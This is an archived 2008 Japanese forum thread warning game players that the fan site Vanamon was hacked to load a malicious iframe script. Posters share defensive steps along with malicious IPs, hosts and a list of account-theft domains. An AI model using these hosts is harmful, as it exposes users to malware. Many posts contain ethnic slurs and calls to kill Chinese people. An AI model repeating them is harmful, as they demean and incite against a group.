5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ヴァナモンがまたハックされてウィルス仕込まれてる

1 :既にその名前は使われています:2008/04/29(火) 01:42:45.21 ID:XjTZz3af
注意喚起

2 :既にその名前は使われています:2008/04/29(火) 01:44:21.10 ID:XjTZz3af
505 名前:既にその名前は使われています[sage] 投稿日:2008/04/29(火) 00:57:04.21 ID:2do4cJve
ソース見てみた。ヴァナモンひらいてメニューがでてくるがその一番上の
エリア別モンスターデータのリンク先にインラインフレームが埋め込まれてて
その先でs111●cnzz●com/に飛ばされてる。
アーガスでみたら北京のサイトだった。
インラインフレーム有効にしてるブラウザで見ないほうがいいね。


508 名前:既にその名前は使われています[] 投稿日:2008/04/29(火) 01:18:35.06 ID:6gn7nHUS
Noscriptにモロでるなw
cnzz●comを許可、とw


511 名前:既にその名前は使われています[] 投稿日:2008/04/29(火) 01:28:26.67 ID:TWwisaod
ヴァナモン修正くるまではできるだけあげとこか
■注意■
4/29 24時ごろ発覚
現在ヴァナモンの「エリア別モンスターデータ」のページにウイルスページを読み込むスクリプトが混入されています
PCのセキュリティに自信の無い方は閲覧を控えるようにしてください。

3 :既にその名前は使われています:2008/04/29(火) 01:44:46.81 ID:XjTZz3af
515 名前:既にその名前は使われています[] 投稿日:2008/04/29(火) 01:33:06.31 ID:6gn7nHUS
222.77.187.187-222.77.187.187

PG2でこれ拒否っとこう


517 名前:既にその名前は使われています[sage] 投稿日:2008/04/29(火) 01:37:18.28 ID:XjTZz3af
対ウィルスソフトじゃ反応しないけど
ForefoxのNoScriptの右クリックで見るとcnzz●comってのがあるな・・・これか
もちろん許可などするなよー

4 :既にその名前は使われています:2008/04/29(火) 01:46:38.42 ID:XjTZz3af
注意age

5 :既にその名前は使われています:2008/04/29(火) 01:48:10.92 ID:CXJBmUBJ
ふざけんなクソ支那!

6 :既にその名前は使われています:2008/04/29(火) 01:49:49.49 ID:tJSRB5j8
一回目はヴァナモンプログで二回目が本家ヴァナモン。
FFユーザーの利用人数多い場所狙い撃ちの可能性あるから、他にも波及してる
可能性あり。

7 :既にその名前は使われています:2008/04/29(火) 01:51:28.19 ID:jtP2H7HR
もう対策されてる?
FirefoxでNoScriptで調べてみたが、cnzz●comを許可という項目はなかった

8 :既にその名前は使われています:2008/04/29(火) 01:51:53.48 ID:CXJBmUBJ
緊急浮上

9 :既にその名前は使われています:2008/04/29(火) 01:52:34.26 ID:g9+/UAo1
aguる

10 :既にその名前は使われています:2008/04/29(火) 01:52:37.59 ID:XjTZz3af
>>7
トップページじゃなくて「エリア別モンスターデータ」をクリックした先のページに埋め込まれてる

11 :既にその名前は使われています:2008/04/29(火) 01:53:25.85 ID:gJSdmhMb
これはあげるべきでしょう

12 :既にその名前は使われています:2008/04/29(火) 01:53:35.56 ID:Va3emdPx
スレタイ
ヴァナモン見た奴は垢ハックされるぞ
本文
ヴァナモンのソースにパス抜きスクリプトが発見された。
今回はブログじゃなくモンスター検索のほう。
最近見た奴はまもなくアイテムもギルもすっからかんの丸裸。
くわしくは垢ハックスレで

依頼するところだった

13 :既にその名前は使われています:2008/04/29(火) 01:54:03.71 ID:dWykpuj5
えーーーーーーー
さっきヴァナモンみちゃったんですけど;;;;;
火狐つかってて、PG2いれてるがはじいてくんなかったYO!!!!
PG2のうpデート確認すると、トロイと中国〜の説明のところが「URL接続エラー」
になってるんですけど・・・。

14 :既にその名前は使われています:2008/04/29(火) 01:54:22.81 ID:/HwP8HgU
ちょwこれいつからハックされてたんよ
この前みたばっかだよw

15 :既にその名前は使われています:2008/04/29(火) 01:54:39.97 ID:jtP2H7HR
>>10
マジだ・・・dクス
こえーなw


俺はこの前のバハ鯖の禿ガル祭でブラウザをFireFoxにしてNoScriptも導入したんだけど
まさかこんなところで役に立つとは・・・ありがとう、禿ガル達!!

16 :既にその名前は使われています:2008/04/29(火) 01:55:02.63 ID:rSNH3sUy
うわ、ウィルス検索でひっかかるかなこれ
感染してるかどうかさえ分からないのかな

17 :既にその名前は使われています:2008/04/29(火) 01:57:28.32 ID:4R3TC2CR
もうサイバーテロだろこれ
シナチクしねや

もうこわすぎてどこも見れないな

18 :既にその名前は使われています:2008/04/29(火) 01:57:28.91 ID:tJSRB5j8
>>13
リネ情報局のURLが変わってるから垢ハックスレ行って新アドのトコ行っておいで。
フォックスならノースプリクトくらい入れてるか最初からスプリクト禁止でしょ?

19 :既にその名前は使われています:2008/04/29(火) 01:57:42.77 ID:XjTZz3af
>>13
ちょっと前にリネージュ資料室のサイト移転したのは知ってるか?
PG2の定義ファイルが置いてある鯖も変わったから更新し直すんだ

FirefoxでNoScriptでスクリプト禁止にしてあれば実行されないから
セキュリティちゃんとしてればヴァナモン踏んだだけでは感染はしない


20 :既にその名前は使われています:2008/04/29(火) 01:58:40.33 ID:WcBUBXPW
ちょっとサイトいってくるわ

21 :既にその名前は使われています:2008/04/29(火) 01:59:32.40 ID:6QG0zwy2
PS2プレイヤーでよかった
まったく心配がない^^

22 :既にその名前は使われています:2008/04/29(火) 02:01:29.75 ID:WcBUBXPW
確かに222のサイトにアクセスしたな
これやばいのか?

23 :既にその名前は使われています:2008/04/29(火) 02:01:50.69 ID:B+FyjPLx
  /ヴァナ\
 /   _ノ  \
 |   ( ●)(●)  <おっと、それ以上は言うなよ…
. |     (__人__)____
  |     ` ⌒/ ─' 'ー\
.  |       /( ○)  (○)\
.  ヽ     /  ⌒(n_人__)⌒ \
   ヽ   |、    (  ヨ    | みんな見ちゃだ、むぐっ!!1
   /    `ー─−  厂   /
   |   、 _   __,,/     \


24 :既にその名前は使われています:2008/04/29(火) 02:02:52.42 ID:KVQ7TL0M
ヴァナモンブログってまだFC2にあるの?
確認したいけどなんか仕込まれてるんじゃ見れんw

25 :既にその名前は使われています:2008/04/29(火) 02:03:03.87 ID:icf/eqqi
つーか、シナチク皆殺しにしたほうがいいな

26 :既にその名前は使われています:2008/04/29(火) 02:04:09.96 ID:KVQ7TL0M
やられたの本家のほうか

27 :既にその名前は使われています:2008/04/29(火) 02:05:23.38 ID:dGWRi6Vr
>>24
ブログじゃなくて本体のほうね。
cnzz.comはaguseで調べたら黒判定だった。

28 :既にその名前は使われています:2008/04/29(火) 02:05:23.46 ID:nvzSxg4Y
>>21
KY

29 :既にその名前は使われています:2008/04/29(火) 02:06:00.22 ID:r8Pn1r1R
もうパスワードcao-ni-maにするは…

30 :既にその名前は使われています:2008/04/29(火) 02:06:50.92 ID:OxtaxObs
もうFF専用のPC買うしかないな・・・

31 :既にその名前は使われています:2008/04/29(火) 02:06:57.30 ID:jtP2H7HR
NoScript入れてあるが、一応POLパス変更した。

32 :既にその名前は使われています:2008/04/29(火) 02:07:14.55 ID:L70eDoY4
独立スレなんだから、

・踏んだらウィルス類がインストールされるのか
・FireFox でスクリプトが走った場合もやばいか

みたいな情報が早くでるといいなあ

33 :既にその名前は使われています:2008/04/29(火) 02:07:41.65 ID:U/d+m6R/
これ、他の有名どころとかはどうなんだろう。

34 :既にその名前は使われています:2008/04/29(火) 02:08:16.05 ID:U/d+m6R/
あげ

35 :既にその名前は使われています:2008/04/29(火) 02:09:18.07 ID:igRdGn3R
またあの伝説のハッカーが降臨しないかなぁ

36 :既にその名前は使われています:2008/04/29(火) 02:11:10.19 ID:wQ5uMnV3
なんでこんなに頻繁にハックされんの?

37 :既にその名前は使われています:2008/04/29(火) 02:11:54.29 ID:JF3pcXqO
セキュリティが甘い
もしくは
三国人が必死

38 :既にその名前は使われています:2008/04/29(火) 02:13:29.81 ID:hfXzCGjY
>>13
かなりまえにリネ資料室はこちらに移転
もちろん定義ファイルのURLもかわってるのでさっさと更新しる
ttp://lineage.paix.jp/

39 :既にその名前は使われています:2008/04/29(火) 02:16:20.88 ID:rFJW7i7Y
ウィルス対策も満足にできない奴がネットの世界に入るなどちゃんちゃらおかしい

40 :既にその名前は使われています:2008/04/29(火) 02:17:12.34 ID:n5oldo4H
なんかもうスクエニの手に負えるもんじゃないような気がしてきた
国に根本的に何とかしてもらいたい

41 :既にその名前は使われています:2008/04/29(火) 02:17:20.15 ID:pQbeuYF+
>>29
FreeTibetにしろ

42 :既にその名前は使われています:2008/04/29(火) 02:17:33.85 ID:L70eDoY4
転載
> PG2のログ調べたところ4/28の1:55には222■77■187■6へのHTTPリクエストをブロックしていた。
> それ以前はしばらくヴァナモン見ていなかったので分からない。

すでに24時間以上がこの状態。被害すごそう

43 :既にその名前は使われています:2008/04/29(火) 02:18:53.64 ID:g9+/UAo1
・・・\(^o^)/

44 :既にその名前は使われています:2008/04/29(火) 02:19:03.70 ID:gNFobZKH
ヴァナモンが借りてるところはXREAかぁ。
今までの流れだとサービス会社がハックされたみたいな見解だったが
仮に今回もそうだとして、あそこ借りてるFFXI系のサイトって他にある?

45 :既にその名前は使われています:2008/04/29(火) 02:19:48.38 ID:hfXzCGjY
>>44
黒魔道士WIKIあたりがそうだったかも?

46 :既にその名前は使われています:2008/04/29(火) 02:21:28.88 ID:dWykpuj5
ありがとー、新しい定義ファイル設定してきたよ。
でも不安だからチェックしたいんだけど、感染してると仮定した場合は
どうすればいいの?

47 :既にその名前は使われています:2008/04/29(火) 02:21:49.28 ID:piK5JzQj
>>44
げ・・・チョコボの宝探し支援サイトXreaだった

48 :既にその名前は使われています:2008/04/29(火) 02:23:23.27 ID:6WVFWGtg
FFのリンク集の//ffxiweb.com
ての月曜に何げしにひらいたら
ウィルスソフト反応したんだけど・・・

49 :既にその名前は使われています:2008/04/29(火) 02:29:47.83 ID:eDZ09A9z
これってFirefoxのオプションで
Javascript禁止にしとけばとりあえず大丈夫かな?
>>40
今回の聖火リレー騒動みると国はもう3国に対してまったくアテにならない存在だということが判明したよ

50 :既にその名前は使われています:2008/04/29(火) 02:29:54.18 ID:NXzHZ1Ry
>>40
特亜との直接ライン増設とか某プロバイダがきばってるぜ

51 :既にその名前は使われています:2008/04/29(火) 02:30:02.72 ID:eDZ09A9z
支援アゲしとく
アゲ忘れた

52 :既にその名前は使われています:2008/04/29(火) 02:32:07.78 ID:hfXzCGjY
>>49
ついでにNoScript入れて、設定でIframe禁止しとけ。

53 :既にその名前は使われています:2008/04/29(火) 02:32:16.29 ID:z50zvEaR
>>44
エレメンもそうかもしれん

54 :既にその名前は使われています:2008/04/29(火) 02:33:59.05 ID:6gn7nHUS
エレメンはPlalaだったきが

55 :既にその名前は使われています:2008/04/29(火) 02:34:44.97 ID:aJ6rP9JP
獣使いwikiも以前Xreaだったもので随分と書き換えされていたな
今は中の人が対応とられたので沈静化したって話だが


56 :既にその名前は使われています:2008/04/29(火) 02:34:56.02 ID:tJSRB5j8
>>49
ファイヤフォックス用アドオンのHPからnoscriptを検索してインスコ。
導入後→オプション→プラグイン→IFなんとかを禁止にチェック。

57 :既にその名前は使われています:2008/04/29(火) 02:35:52.51 ID:kNMe13Fw
重要あげ

58 :既にその名前は使われています:2008/04/29(火) 02:36:49.73 ID:eDZ09A9z
>>52
>>56
レスサンクスやっとくわ

59 :既にその名前は使われています:2008/04/29(火) 02:36:49.86 ID:+81PmG+D
いい加減にしろ、チャイナ・・・
なにこの国際犯罪国家

60 :既にその名前は使われています:2008/04/29(火) 02:37:08.82 ID:63lCFU83
おいいい?ブログじゃなくてモンス検索ページにしこまれたわけ?

61 :既にその名前は使われています:2008/04/29(火) 02:37:51.91 ID:18lv04K1
>>54
あそこはxreaからも糞重いデーター引っ張ってる。
とてもとてもここではいえないデータ・・・

62 :既にその名前は使われています:2008/04/29(火) 02:37:55.72 ID:gNFobZKH
XREA結構あるんだな、まだわからんけど注意しとくよ。
もしエレメンハックされたら被害すげぇだろうなぁ・・・

63 :既にその名前は使われています:2008/04/29(火) 02:42:06.85 ID:D+pLk1zn
>>29
やつらがもっとも恐れるワード
「64TienanmenMassacre」(六四天安門事件)

この話題は奴等の間では絶対のタブー
関わると村八分確定の恐怖ワード

64 :既にその名前は使われています:2008/04/29(火) 02:42:14.87 ID:nE6TwJh6
もう怖くてFF系のホムペ見られないな、、、
シナ乞食は早く氏ねばいいのに。

65 :既にその名前は使われています:2008/04/29(火) 02:42:29.66 ID:+8sfA5Qr
インラインフレームで指定されてるのはtop.htmなのね。
そのhtmで>>2のサイトに飛ばされるけど
ヴァナモンのwebスペースにtop.htmを設置されたって事だよね。

66 :既にその名前は使われています:2008/04/29(火) 02:42:57.81 ID:eDZ09A9z
今Noscript導入した
elemenみたらXREAにも制限かかってるね

67 :既にその名前は使われています:2008/04/29(火) 02:46:34.57 ID:nvzSxg4Y
これ踏んじゃった後はどうすりゃいいんだ・・・?
とりあえずPOLパス変更した((((゜д゜;))))

68 :既にその名前は使われています:2008/04/29(火) 02:47:06.29 ID:Z3l+N2CB
XREAだから危険とかそういう話ではないと思うよ。
OSの層でやられたなら話は別だけど、それならほかのサイトにも被害が広がっておかしくない。

もうちょっと上の層でやられてるんじゃないかな。SQLインジェクションとか。

69 :既にその名前は使われています:2008/04/29(火) 02:50:02.73 ID:hfXzCGjY
>>67
とりあえず詳細がわからんので、Peerguardian2導入して中華IPなどを弾く設定してからもう一度パス変えたら?

70 :既にその名前は使われています:2008/04/29(火) 02:50:48.27 ID:nvzSxg4Y
>>69
トンクス!やってみる

71 :既にその名前は使われています:2008/04/29(火) 02:50:59.26 ID:f9uMTTtF
こういうヘイト上げる事ばかりして、他国の妬みだ!とか抜かしてんだろ?
ほんと理解できないモノだな

72 :既にその名前は使われています:2008/04/29(火) 02:51:46.49 ID:wQ5uMnV3
Peerguardian2のサイトに繋がらない!繋がりにくい!

73 :既にその名前は使われています:2008/04/29(火) 02:51:52.90 ID:WcBUBXPW
オンラインスキャンでお勧めどこだっけ

74 :既にその名前は使われています:2008/04/29(火) 02:52:32.28 ID:BAB4lPDe
あげあげ

75 :既にその名前は使われています:2008/04/29(火) 02:52:40.79 ID:QaJ664z6
かすぺるすきー

76 :既にその名前は使われています:2008/04/29(火) 02:53:02.84 ID:h5Cm2gPg
そのうちネ実見てるだけでハックされたりな

77 :既にその名前は使われています:2008/04/29(火) 02:53:19.21 ID:hfXzCGjY
>>73
カスペルスキー?

78 :既にその名前は使われています:2008/04/29(火) 02:55:22.27 ID:JF3pcXqO
>>71
差別だと叫びます

79 :既にその名前は使われています:2008/04/29(火) 02:56:19.21 ID:dZVTlEWx
腐れシナがうぜな死ね。火狐、PG2、NoScript入れてるからcnzz.comも
ブロックしてたがPG2のリストにも入れといた。チョン、シナは死ね糞が

80 :既にその名前は使われています:2008/04/29(火) 02:57:15.18 ID:9JvOb6hW
これ、ノートン先生は反応しないのかね?

81 :既にその名前は使われています:2008/04/29(火) 02:58:01.96 ID:NrdoOuZQ
分からんうちは対処法全部試した方がいいよ
まず中国のIP全部弾いといて、普通のサイトだけ許可していけばいい
ウィルスやBot対策もひとつの方法(たとえばノートンだけとか)で済まさず必ず複数やること

82 :既にその名前は使われています:2008/04/29(火) 02:59:35.36 ID:NXzHZ1Ry
うちはAdwareとSpy&botとノートン先生とPG2

83 :既にその名前は使われています:2008/04/29(火) 03:01:29.14 ID:OqePFS4f
>>81
分からないうちはウィルス対策は複数いれたら駄目だろw


84 :既にその名前は使われています:2008/04/29(火) 03:03:56.69 ID:iwqpWBlZ
ブラウザでスクリプト切ってあればそもそも実行されないから対ウィルスソフトも反応しないんじゃないかな
反応したっていう人はたぶんIE+対ウィルスソフト(最新版定義ファイル)とかじゃないか

もちろんブラウザでセキュリティ意識した設定にした上で対ウィルスソフトも最新版に保つのが望ましいが

85 :既にその名前は使われています:2008/04/29(火) 03:04:03.13 ID:63lCFU83
>>61
こんな状態なんだから晒してほしい。

86 :既にその名前は使われています:2008/04/29(火) 03:04:45.78 ID:NrdoOuZQ
>>83
言葉が足りなかったか、常駐ソフトに加えてオンラインスキャンしたりね
あとスパイウェア専用のソフトいれるとか

87 :既にその名前は使われています:2008/04/29(火) 03:06:19.88 ID:+8sfA5Qr
>>84
IEでもスクリプト切ってる人多いでしょ。

88 :既にその名前は使われています:2008/04/29(火) 03:06:40.02 ID:fXrWze/8
これは上げておかねば

89 :既にその名前は使われています:2008/04/29(火) 03:10:17.35 ID:+GNBdofq
ヴァナモン最近覗いちゃったな〜。
ちょっと気になるけど眠気には勝てんな、悪夢にうなされてくるわw

90 :既にその名前は使われています:2008/04/29(火) 03:10:33.19 ID:L70eDoY4
○ ヴァナモンのモンスター検索がクラックされている
  ブログではなく、モンスター検索が対象

○ 27日にはすでにウィルス仕込み済みであった
  すでに27時間が経過している

○ スクリプトを含む HTML が vanamon.com に配置されている
  このため、vanamon.com でスクリプトが有効だと実行される

○ ヴァナモンは xrea.com のサーバを利用しているが、
  現状で他の xrea.com を利用したサイトの報告はなし

間違いや補足あればよろしく

91 :既にその名前は使われています:2008/04/29(火) 03:11:29.11 ID:6COFgsce
もう日本以外のアジア圏からのアクセスは弾けよスクエニさんよ・・ついでにバンしとけ

92 :既にその名前は使われています:2008/04/29(火) 03:12:26.36 ID:63lCFU83
問題のページのソースみた。
下から3番目。
Firefox画面、紫の白の境めに黒いぽっちもある。
http://tune.ache-bang.com/~vg/outitem/up/img/19473.jpg

93 :既にその名前は使われています:2008/04/29(火) 03:13:58.64 ID:6COFgsce
よく考えると、GWだからサポセンの対応が遅れるのを狙って仕込んだのかな?

94 :既にその名前は使われています:2008/04/29(火) 03:15:52.07 ID:23xj3sgk
>>93
巻き戻し可能になったとはいえハックできれば丸儲けって事実は変わらんしなー
むしろ巻き戻せるようになったからサポセンの対応が遅れるってのが業者有利に働いてると考える事もできる

95 :既にその名前は使われています:2008/04/29(火) 03:19:10.97 ID:+8sfA5Qr
飛ばされた先で何が仕込まれるとか何がどうなるという報告はまだないよね。
とりあえずカスペルでスキャン中・・・。

96 :既にその名前は使われています:2008/04/29(火) 03:20:26.45 ID:6COFgsce
24時間年中無休でサポートしないグズエニ。殿様商売うまーだな

97 :既にその名前は使われています:2008/04/29(火) 03:20:29.32 ID:WcBUBXPW
ウィルスあると分かって踏んだ俺がスキャン中
何か出たら報告する

98 :既にその名前は使われています:2008/04/29(火) 03:21:54.38 ID:efvHHwLk
>>93
まさしくそのとおりだと思う。
今週末も危ないな。

99 :既にその名前は使われています:2008/04/29(火) 03:21:58.05 ID:6aNOosh3
スクリプトがあるはずのURL飛んでもログイン画面になるからよくわかんね

100 :既にその名前は使われています:2008/04/29(火) 03:23:36.68 ID:YeSgLNSQ
うちのウィルスバスターはトロイ検知した。
ヴァナモンでもらったやつかは確信もてんが。

101 :既にその名前は使われています:2008/04/29(火) 03:23:53.07 ID:xoxNwdCD
GoblinClubも来た
納品の材料調べるとこから
セキュリティーソフトをアンインストールして下さいだと

対策ページに飛べないしきっぱり辞められそうだわ・・・

102 :既にその名前は使われています:2008/04/29(火) 03:25:17.22 ID:18lv04K1
ついでにいままで2chに貼られた垢抜きサイトのurl
playonlanei.com
maplestorfy.com
homepagenir.com
moguiceshigong.vicp.net
netbenrit.com
mediamax.com
upfordown.com
u.hmhk.org
webmastei.com
gigigi.net
infosueek.com
#貼ってもrep2であぽーん登録してるので自分では見れないがw


103 :既にその名前は使われています:2008/04/29(火) 03:25:26.90 ID:HV+2Gsxp
そろそろ本気で買い手どうにかしないとだな
買い手が居る限り売り手(業者)のあの手この手のコミュニティ潰しは納まらない

104 :既にその名前は使われています:2008/04/29(火) 03:25:46.33 ID:Gzz/9VV1
>>101
よく意味がわからない

105 :既にその名前は使われています:2008/04/29(火) 03:26:06.32 ID:6COFgsce
POLの設定で自宅以外からのアクセス弾くような事は不可能なのかな?

106 :既にその名前は使われています:2008/04/29(火) 03:28:10.49 ID:hfXzCGjY
>>103
つか、公式で大々的に「買い手は徹底的につぶしますよ」宣言するだけでもかなり違うとおもうんだけどなぁ・・・

107 :既にその名前は使われています:2008/04/29(火) 03:29:15.37 ID:Gzz/9VV1
実際、買い手を潰してるような雰囲気感じられないしな

108 :既にその名前は使われています:2008/04/29(火) 03:29:49.64 ID:si0l10U4
中国もアレだがギル買ってるやつも相当だよなぁ。

109 :既にその名前は使われています:2008/04/29(火) 03:30:16.21 ID:18lv04K1
>>105
それは前に他スレで書いたけど
ログインするプロバイダーを予め指定する方法もある。
これも要望だしたけど■はユーザーの有利な事になることはしないからな。


110 :既にその名前は使われています:2008/04/29(火) 03:30:33.88 ID:OkzY1YDc
はああああああああああああああああああああああああああああああ!
中華うぜええええええええええええええええええええええええ

111 :既にその名前は使われています:2008/04/29(火) 03:31:24.77 ID:18lv04K1
>>107
本当にBANしてるなら専用ページを作って名前を公表するべきなんだよな
そんなページ作るのが面倒だからやらないと思うが

112 :既にその名前は使われています:2008/04/29(火) 03:31:24.81 ID:6aNOosh3
ダウンロードされるjavascriptのソースのSS
http://vanana.sakura.ne.jp/image/monmonmon.png

113 :既にその名前は使われています:2008/04/29(火) 03:32:26.17 ID:xoxNwdCD
>>104
俺も良く分からんw
一応GoblinClubのほうも注意しとけとしか

114 :既にその名前は使われています:2008/04/29(火) 03:32:28.45 ID:Gzz/9VV1
>>111
公表してくれるならテキストベースでいいのにな、ぶっちゃけw


115 :既にその名前は使われています:2008/04/29(火) 03:33:38.71 ID:fXrWze/8
今の所、ヴァナモンとゴブクラだけ?

116 :既にその名前は使われています:2008/04/29(火) 03:33:42.59 ID:81hHNZ0f
いい加減日本以外のIPのログインは弾けっつーの


117 :既にその名前は使われています:2008/04/29(火) 03:33:50.71 ID:Gzz/9VV1
>>113
おk、わかった
落ち着いてもう一度レスしてみろ

118 :既にその名前は使われています:2008/04/29(火) 03:35:07.66 ID:L70eDoY4
スクリプトだけじゃなくて画像形式のなにかも入ってる > top.htm

119 :既にその名前は使われています:2008/04/29(火) 03:35:34.22 ID:63lCFU83
>>112
これ実行されるとやhぁいんだよな…

120 :既にその名前は使われています:2008/04/29(火) 03:35:46.55 ID:tJSRB5j8
ゴブリのトコでセキリティソフトをアンインストールしてくださいって出た?

121 :既にその名前は使われています:2008/04/29(火) 03:37:28.70 ID:YeSgLNSQ
>>116
日本にいる中華がログインしてたらどうすんだ?
留学生にでも代理でやらせて終了だろう。

122 :既にその名前は使われています:2008/04/29(火) 03:37:33.04 ID:6aNOosh3
全部表示しきれてなかったからスクリプトのSS更新しといた

123 :既にその名前は使われています:2008/04/29(火) 03:37:42.28 ID:fJy1nDGA
>>111
実際に発表してる数だけ処分してるなら
その社内用の処分者リストから鯖毎にキャラ名抜いて発表用リスト作るくらい簡単だろ
それくらいの手間はかけるべきだと思うんだけどな
大した手間じゃないんだし

124 :既にその名前は使われています:2008/04/29(火) 03:38:43.53 ID:fXrWze/8
ゴブリまできたのか;

125 :既にその名前は使われています:2008/04/29(火) 03:39:10.13 ID:iwqpWBlZ
>>121
日本にいるやつならISPログとか調べて場所特定して逮捕できるんじゃね?

126 :既にその名前は使われています:2008/04/29(火) 03:40:08.18 ID:81hHNZ0f
>>121
その手間をかけされるだけでも大分数減るだろ?

127 :既にその名前は使われています:2008/04/29(火) 03:41:32.29 ID:6COFgsce
糞が・・聖火リレー見に行って腐れ中華ぼこってくればよかった。

128 :既にその名前は使われています:2008/04/29(火) 03:42:59.00 ID:23xj3sgk
一人送り込むだけでもかなりの労力と資金が必要だからな
少なくとも利益率は大幅に下がる

129 :既にその名前は使われています:2008/04/29(火) 03:43:56.34 ID:ZfQ6r9dN
>>121
国内犯罪なら逮捕可能だろう。

130 :既にその名前は使われています:2008/04/29(火) 03:44:09.98 ID:HV+2Gsxp
>>106
常習者は脅し文句としか取ってないんだろうからなぁ
一番の問題は1回目をお目溢ししてるから2回目しなきゃいいって風潮が形成されている様だし
買い手の内、ネカフェ捨て垢ロンダリングでメインに送金なんてやる奴も居ないとは言えない
業者に到ってはクラック垢踏み台にして送金してるかもしれないしな
まぁ、業者にしてみれば弾き出された実績を作って他の運営も追随した日にゃ飯のくいっぱくれだし
躍起になって潰しに掛かってくるだろうが■にはココが正念場とがんばって欲しいところ

131 :既にその名前は使われています:2008/04/29(火) 03:45:10.94 ID:63lCFU83
ゴブリンクラブってこれ?
ttp://goblinclub■org/guild_pattern.php

132 :既にその名前は使われています:2008/04/29(火) 03:45:12.24 ID:fXrWze/8
リネみたいに留学生抑えれば潰せますしw
てゆーか日本が金出して裏じゃこんな事やってるようじゃねー、無駄金だな
いくら出してるか知ってるか厨国の留学生に・・・

133 :既にその名前は使われています:2008/04/29(火) 03:45:12.25 ID:iwqpWBlZ
ゴブクラの納品のページってこれか?
とりあえずNoScriptでスクリプト一覧出してみたけど俺じゃー有害かどうかわからん
ttp://tune.ache-bang.com/~vg/outitem/up/img/19474.jpg

134 :既にその名前は使われています:2008/04/29(火) 03:46:35.39 ID:23xj3sgk
もうこれ再度禿に及ばないとダメだろ。2ch見ないけどヴァナモン見てる人多いしマジ手遅れになる。
いい加減、犯罪に加担してる買い手を保護してる場合じゃないだろ・・・

135 :既にその名前は使われています:2008/04/29(火) 03:47:19.84 ID:g9+/UAo1
国内だったらどうにか捕まえられないかねぇ…

136 :既にその名前は使われています:2008/04/29(火) 03:47:45.28 ID:ZfQ6r9dN
買い手の名前付き処分発表が一番だろ。
一発BANじゃなくても買い手として処分発表されたら相当なダメージ。
買い手も売り手も巧妙になるだろうけど手間を増やさせるだけでも効果ある。
ちょっと買ってみようか程度の奴は相当数手を出せなくなるしな。

137 :既にその名前は使われています:2008/04/29(火) 03:47:46.97 ID:B+FyjPLx
今日からは祝日、そしてこのタイミング。あとはわかるな・・・

138 :既にその名前は使われています:2008/04/29(火) 03:49:01.34 ID:HV+2Gsxp
あ、>>130に補足で
業者の潰すのはゲームだけじゃなくコミュニティも潰しに掛かるって所
この辺よくよく考えとかないと後々の業績に響く事になるって所は気付いて欲しい

139 :既にその名前は使われています:2008/04/29(火) 03:49:06.64 ID:tGFX2woT
買ってる奴って身近な人間がハックされて取られた金かもしれないのを買ってる場合もあるとか考えないのかな

140 :既にその名前は使われています:2008/04/29(火) 03:49:22.61 ID:WcBUBXPW
買い手アカのキャラを全部発表で良いんじゃない

141 :既にその名前は使われています:2008/04/29(火) 03:49:36.00 ID:63lCFU83
>>135
全鯖規模だな、今度は。
ヴァナモンはやばすぎる。

142 :既にその名前は使われています:2008/04/29(火) 03:50:23.16 ID:xoxNwdCD
>>117
すまんwww
意味分からんなww

>>120
すまんセキュリティーソフトをアンインストールして下さいってのはこっちのPCが出たんだと思う

かなり寝ぼけてたんで何があったのかどうかは分からんうちに閉じてしまったw
ちなみにかなり高くしてあったセキュリティー設定が滅茶苦茶低くなってたから多分他で何かやられてたのかもしれん

眠いのでアンインストールして下さいって言われたセキュリティーソフトでウィルスチェックして寝る!ww
もういいやw
何かあるのは確かだと思うから一応皆気をつけてくれ〜

143 :既にその名前は使われています:2008/04/29(火) 03:50:38.37 ID:YeSgLNSQ
確かに国内ならネカフェ使おうと本気だせば捕まえられそうだ。
まぁ、、仮に中国からのIPのみ弾くとかすると差別だとか言うんだろね。
米国、欧米にもサービス展開してるから日本のみってのは今更不可能だろうし。

144 :既にその名前は使われています:2008/04/29(火) 03:50:53.70 ID:63lCFU83
>>139
コミュニティ潰し許して下さい;;
サイト改変しゃれにならないっす

145 :既にその名前は使われています:2008/04/29(火) 03:50:57.43 ID:fJy1nDGA
俺の妄想では、運営自体が業者に蝕まれてることになってる
Tさんはどうだか知らないけど、すんぢは真っ黒
国税でも公安でもいいから金の出入り調べてくれないかなあw

146 :既にその名前は使われています:2008/04/29(火) 03:51:51.55 ID:B+FyjPLx
ヴァナモンの管理人がすやすや眠っている夜、祭りはどんどん進行するのであった

147 :既にその名前は使われています:2008/04/29(火) 03:52:12.70 ID:Gzz/9VV1
>>145
ちょっとお前から邪気眼を感じる

148 :既にその名前は使われています:2008/04/29(火) 03:53:27.40 ID:6aNOosh3
環境情報をクッキーに入れて、イメージリンクで「222.77.187.6」のstart.htmlに送信している模様。
情報を元に環境毎のセキュリティホール突くつもりなのかな

149 :既にその名前は使われています:2008/04/29(火) 03:53:52.24 ID:23xj3sgk
>>141
前回は主催に国センへの通報や■糾弾も視野に入れるよう説得したけど、今回は自ら出て行きたいわ
これぶっちゃけ対応できるの平日の水曜までがリミットじゃね?

150 :既にその名前は使われています:2008/04/29(火) 03:54:40.52 ID:WcBUBXPW
サイト踏んでからFFログインしてないが
ドキドキだなこりゃ

151 :既にその名前は使われています:2008/04/29(火) 03:56:37.79 ID:3VSxrre+
もうコツコツ金策したりエクレア装備頑張って取ったりキャラ育てる価値ないなこのゲーム
長くてもあと一年くらいで終わりだろ

152 :既にその名前は使われています:2008/04/29(火) 03:56:48.43 ID:ah77Y5RN
運営が業者とか癌ホーさんもびっくり!

153 :既にその名前は使われています:2008/04/29(火) 03:57:52.96 ID:cKfQGCKL
なんか大変そうだな。
何年か前の時みたいにジャンプ先クラックとかできないの?


154 :既にその名前は使われています:2008/04/29(火) 03:57:53.37 ID:fXrWze/8
でもサゲ朕やら藤戸を、リアルから堕とすのも手だろう
仮に経済担当やらGMの元締めが顔出していいのかなーと思ったもの

155 :既にその名前は使われています:2008/04/29(火) 03:57:56.88 ID:g8T6INkW
そういえば、垢ハックしたあとの業者の競売売りキャラと思われる
キャラは垢バンされたの?

垢ハックはユーザー側にもダメージでかいけど、
売らないとギルにならないから、そこから辿って一網打尽にするには
■にとっても都合が良いと思うんだけどな。

156 :既にその名前は使われています:2008/04/29(火) 03:59:54.63 ID:YnuML01O
その癌砲でさへ海外IP弾く事にしたはず

157 :既にその名前は使われています:2008/04/29(火) 04:00:35.16 ID:18lv04K1
>>151
こうなってしまったのも外人を入れたり初期に業者対策をしてなかったからだし
■の自業自得だな。

158 :既にその名前は使われています:2008/04/29(火) 04:00:49.81 ID:tGFX2woT
>>152
